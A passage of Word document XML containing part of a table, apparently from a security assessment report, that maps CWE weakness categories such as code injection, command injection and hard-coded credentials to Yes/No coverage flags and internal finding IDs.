              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Control of Generation of Code (Code Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, CI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-05, APP-10, APP-13, CF-01, CF-02, CF-06, CF-07, CF-08, CF-14, CF-15, CF-16, CF-18, PB1-07, PB1-11, PB1-12, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Special Elements used in a Command (Command Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-02, DET-05, PB1-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-287</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-269</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Privilege Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deserialization of Untrusted Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exposure of Sensitive Information to an Unauthorized Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11, CF-12, PB1-16, PB2-13, SEC-03, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-863</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incorrect Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-918</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-119</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Restriction of Operations within the Bounds of a Memory Buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-476</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>NULL Pointer Dereference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use of Hard-coded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14, PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Integer Overflow or Wraparound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Uncontrolled Resource Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04, CF-05, CF-07, CI-05, CI-15, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing Authentication for Critical Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
